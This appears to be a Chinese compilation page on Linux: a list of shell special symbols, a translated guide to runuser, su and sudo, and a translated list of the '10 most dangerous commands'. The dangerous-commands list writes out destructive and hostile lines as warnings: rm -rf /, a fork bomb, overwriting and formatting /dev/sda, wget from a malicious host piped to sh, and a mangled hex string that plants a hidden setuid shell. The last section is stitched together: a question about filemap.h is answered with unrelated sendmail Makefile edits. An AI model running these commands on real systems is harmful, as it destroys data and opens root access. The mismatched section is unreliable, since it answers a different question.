㈠ linux特殊符号大全
tab:文本分隔符,相当于四个空格,在命令行界面可以用来自动补齐命令与目录。
ESC:esc+. ,上一条命令的选项参数,vim恢复到命令模式。
~:家目录
`:反引号,编程中调用shell命令
!:调用前面的命令,!!调用上一条,!23调用前面低23条。
@:at符,后面接IP地址。
#:Linux文件中注释行,表示不起作用。
$:文件行结尾标识符,变量标识符。
%:格式化文本。
^:文件行首标识符
&:任务放到后台
*:通配符,代表一个字符或者很多个字符。
\:用来转义,\t表示制表符,\n表示换行符。
<:数据流的流入方向,表示输入,将数据传入给左侧软件。
|:管道,改变数据流的方向,将数据传入给另外的软件。
>:数据流的流出方向,表示输出,将屏幕输出的内容写入一个文件。
2>:数据流的流出的第二个方向,表示错误输出,报错信息会写入到这个文件中。
>>:表示追加写入
/:根目录,目录分隔符
‘’:双引号,支持转义
‘:单引号,不支持转义
():shell编程中使用,命令行用的不多
[]:索引
{}:代码块
::vim或者less命令中,表示可以输入命令
;:分割不同命令
-:短选项标识符-h
--:长选项标识符--help
㈡ linux下切换用户命令
#1:runuser命令 runuser命令使用一个替代的用户或者组ID运行一个Shell。这个命令仅在root用户时有用。 仅以会话PAM钩子运行,并且没有密码提示。如果用一个非root用户,并且该用户没有权限设置user ID,这个命令将会因为程序没有setuid而失败。因runuser不会运行认证和账户PAM钩子,它比su更底层。 语法: 代码如下: runuser -l userNameHere -c 'command' runuser -l userNameHere -c '/path/to/command arg1 arg2' 举例来说,作为一个root用户,你也许想检查下oracle用户下的shell资源限制,输入: 代码如下: # runuser -l oracle -c 'ulimit -SHa' 或者监察下nginx或lighttpd web服务器限制: 代码如下: # runuser -l nginx -c 'ulimit -SHa' 或 代码如下: # runuser -l lighttpd -c 'ulimit -SHa' 有时,root用户由于权限(安全)问题不能浏览NFS挂载的共享: 代码如下: # ls -l /nfs/wwwroot/cyberciti.biz/http 或 代码如下: # cd /nfs/wwwroot/cyberciti.biz/http 可能的输出: 代码如下: -bash: cd: /nfs/wwwroot/cyberciti.biz/http/: Permission denied 尽管如此,apache用户被允许浏览或访问挂载在/nfs/wwwroot/cyberciti.biz/http/下基于nfs的系统: 代码如下: # runuser -l apache -c 'ls -l /nfs/wwwroot/cyberciti.biz/http/' 或 代码如下: # runuser -l apache -c 'cd /nfs/wwwroot/cyberciti.biz/http/; vi index.php' 使用runuser命令,无需使用密码,并且,只能在root用户下使用。 可用选项: -l: 让shell成为登录shell,用 runuser -l PAM 文件替代默认的 -g:指定主要的组 -G 追加组 -c:命令,要传到shell的单个命令 --session-command=COMMAND:使用-c传递单个命令道shell中并且不创建新的会话 -m: 不重置环境变量。 #2:su命令 su命令允许你成为一个超级用户或者替代用户(substitute user),欺骗用户(spoof user),设置用户(set user)或者切换用户(switch user)。它允许一个Linxu用户切换当前用户到那些你知道密码的目标用户,切换包括与之关联的运行中的控制台(console)或者Shell,它的语法如下: 代码如下: su - su - username 切换到root用户 su命令会询问目标用户的密码,在你的shell命令行中输入 su - 来切换到root用户(你必须知道root用户的密码): 代码如下: vivek@wks01:~$ su - 或 代码如下: vivek@wks01:~$ su - root 输出示例: Password: 代码如下: root@wks01:/root# logout vivek@wks01:~$ 如果输入了正确的root密码,会话的所有权(这里应该指当前控制台的上下文——译注)将改为root账户。输入logout可以退出一个root登录的shell,输入 whoami或者id命令来验证当前会话的所有者: whoami 或 id 用root账户运行命令 语法是: 代码如下: su - root -c "command" 或 代码如下: su - -c "command arg1" 查看/root目录下的内容,这些原本是普通用户无法访问的,运行: 代码如下: su - root -c "ls -l /root" 需要注意的是,Linix和一些Unix-like系统有一个wheel用户组,并且只允许这个组内的用户使用su切换到root。 使用su命令来让其他用户运行命令 下面这个命令是切换到oracle的账户,并且显示限制清单: 代码如下: $ su - oracle -c 'ulimit -aHS' 同样, 如果提供了正确的oracle密码,会话所有权将会变成oracle账户。su命令的日志保存在系统日志中,一般是在/var/log/auth.log(Debian/Ubuntu)或者/var/log/secure(RHEL/CentOS)。 #3: sudo命令 sudo以另外的用户来执行一个命令,但是它跟着一组关于那些用户可以以那些其他用户执行那些命令的规则(有点绕口——译注)。这个规则在/etc/sudoers这个文件中被定义。不像su,sudo验证用户是靠用户自己的密码而不是那个要切换的用户密码。当提供一个审计跟踪命令和他们的参数时(原文:...whileproviding an audit trail of the commands and their arguments——译注)sudo允许一个系统管理员给某些用户(或用户组)委派以root或其他用户来运行某些(或全部)命令的权限。这允许无需在用户之间共享密码就可以在指定宿主上将指定命令委派给指定用户。语法如下: 代码如下: sudo command GUI工具注意事项(su和sudo的前端GUI) gksu 命令是su的前台,gksudo 是sudo的前端。他们的主要用途是用来运行需要root权限但不需要运行一个X terminal emulator和使用直接使用su的图形化命令。语法如下: 代码如下: gksu [-u ] [options] gksudo [-u ] [options] 仅输入gksu,将会显示下面这个弹窗: 然后,你将会被要求输入root用户的密码: 你也可以直接运行下面代码: 代码如下: gksu -u root 'ls /root' 或,以oracle用户运行命令: 代码如下: gksu -u oracle 'ulimit -aHS' 或作为root登录: 代码如下: gksu -u root -l 总结:runuser VS su VS sudo
㈢ Linux中最危险的10个命令
Linux中最危险的10个命令
对于编程人员或或者Linux系统管理员来说,操作Linux系统最常见的方法就是使用命令行。当然,Linux命令行佷有用、很高效,但有时候也很危险,尤其是在你误操作或者不确定你自己在正在做什么的时候。下面我就为大家盘点最危险是10个命令,一起来看看吧!
当然,以下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普 通用户身份下,破坏的只是自己的一亩三分地。
1. rm -rf 命令
rm -rf命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些rm 命令的选项。
rm命令在Linux下通常用来删除文件。
rm -r 命令递归的删除文件夹,甚至是空的文件夹。(译注:个人认为此处应该是说错了,从常识看,应该是“甚至是非空的文件夹”)
rm -f 命令能不经过询问直接删除‘只读文件’。(译注:Linux下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限。所以,-f这个参数 只是表示不必一个个删除确认,而是一律悄悄删除。另外,原始的rm命令其实也是没有删除提示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来 要求删除确认,而-f则抑制了这个提示。)
rm -rf / : 强制删除根目录下所有东东。(就是说删除完毕后,什么也没有了。。。)
rm -rf *:强制删除当前目录的所有文件。
rm -rf . : 强制删除当前文件夹及其子文件夹。
从 现在起,当你要执行rm -rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名,来预防用 ‘rm‘命令删除文件时的事故,它会要求你确认每一个删除请求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好 你在做什么!译者本人有着血泪的教训啊。)
2. :(){:|:&};: 命令
这就是个fork 炸弹的实例。具体操作是通过定义一个名为 ‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。
:(){:|:&};:
哦?你确认你要试试么?千万别在公司正式的服务器上实验啊~~
3. 命令> /dev/sda
上列命令会将某个‘命令‘的输出写到块设备/dev/sda中。该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。
4. mv 文件夹 /dev/null
这 个命令会移动某个‘文件夹‘到/dev/null。在Linux中 /dev/null 或 null 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。(译注:这就是黑洞啊。当然,要说明的是,通过将文件夹移动到黑洞,并不能阻止 数据恢复软件的救赎,所以,真正的`彻底毁灭,需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。)
# mv /home/user/* /dev/null
上列命令会将User目录所有内容移动到/dev/null,这意味着所有东西都被‘卷入’黑洞(null)之中。
5. wget http://malicious_source -O- | sh
上列命令会从一个(也许是)恶意源下载一个脚本并执行。Wget命令会下载这个脚本,而sh会(无条件的)执行下载下来的脚本。
注意: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。(译注:所以,你真的知道你在做什么吗?当遇到这种需要是,我的做法是,先wget下来,然后我去读一读其中到底写了些什么,然后考虑是否执行。)
6. mkfs.ext3 /dev/sda
上列命令会格式化块设备‘sda’,你无疑知道在执行上列命令后你的块设备(硬盘驱 动器)会被格式化,崭新的!没有任何数据,直接让你的系统达到不可恢复的阶段。(译注:通常不会直接使用/dev/sda这样的设备,除非是作为raw设 备使用,一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然,无论你使用sda还是sda1,这样对块设备或分区进行mkfs都是毁 灭性的,上面的数据都会被蒸发了。)
7. > file
上列命令常用来清空文件内容(译注:通常也用于记录命令输出。 不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外,我想你可能真正想用的是 “>>”,即累加新的输出到文件,而不是刷新那个文件。)。如果用上列执行时输入错误或无知的输入类似 “>xt.conf”的命令会覆盖配置文件或其他任何的系统配置文件。
8. ^foo^bar
这个命令在“鲜为人知而又实用的 Linux 命令大全:http://blog.csdn.net/zhu_xun/article/details/17018799”中描述过,用来编辑先前运行的命令而无需重打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。(译注:事实上,这种小技巧是译者认为的,少数史前时代遗留下来的无用而有害的“黑客”技巧。)
9. dd if=/dev/random of=/dev/sda
上列命令会向块设备sda写入随机的垃圾文件从而擦出数据。当然!你的系统可能陷入混乱和不可恢复的状态。(译注:记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见,你可以覆写多次。)
10. 隐藏命令
下面的命令其实就是上面第一个命令 (rm -rf)。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的根分区。
这个命令表明通常真正的危险是隐藏的,不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。不要编译/运行从未知来源的代码。
char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “″“″“″“″“″“″“x6ex2fx73x68x00x2dx63x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;
注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令,因为这将导致数据丢失或者系统崩溃。如果你想测试它们,请在虚拟机上运行。
;㈣ linux源代码,求详细分析,代码如下,来自 /mm: filemap.h
找到了个帖子,你可以参考参考。原帖地址:
参考:
如果你没有安装Berkeley db(8)库软件包,或不知是否拥有;你就需要在Makefile文件中去除对它的支持。编辑你的Makefile文件,查找以DBMDEF开始的行:
DBMDEF= -DNDBM –DNEWDB –DINS ?这一行
删除这个部分
删除字符串“-DNEWDB”这个部分后,修改完成后,结果如下所示:
DBMDEF= -DNDBM –DNIS ?删除以后
接着查找以LIBS开始的行:
LIBS= -ldb -ldbm -lresolv?这一行(不完全准确)
删除这个部分
删除这行的字符串“-ldb”这个部分,修改完成后,结果如下所示:
LIBS= -ldbm -lresolv ?删除以后
这样就完成了从你的Makefile中删除对Berkeley db的支持。
如果你的系统支持Berkeley db的话,则你还需要给Makefile一些消息。必须指定正确的头文件和库函数的路径,以便将其包含到sendmail中去。查找以INCDIRS开始的行:
INCDIRS=-I/usr/sww/include ?这一行
# loader options
LDOPTS= -Bstatic
# Library directories
LIBDIRS=-L/usr/sww/lib ?还有这一行
你需要将这两行中的路径名改为Berkeley db的库所在路径。如果你无法确定,最好去除对Berkeley db的支持。
INCDIRS=-I/usr/local/include/db ?新的
# loader options
LDOPTS= -Bstatic
# Library directories
LIBDIRS=-L/usr/local/lib ?新的
上面这个修改的例子,是基于Berkeley db的头文件在/usr/local/include/db,库文件在/usr/local/lib目录下所做的,可供参考。
希望以上内容对你有所帮助!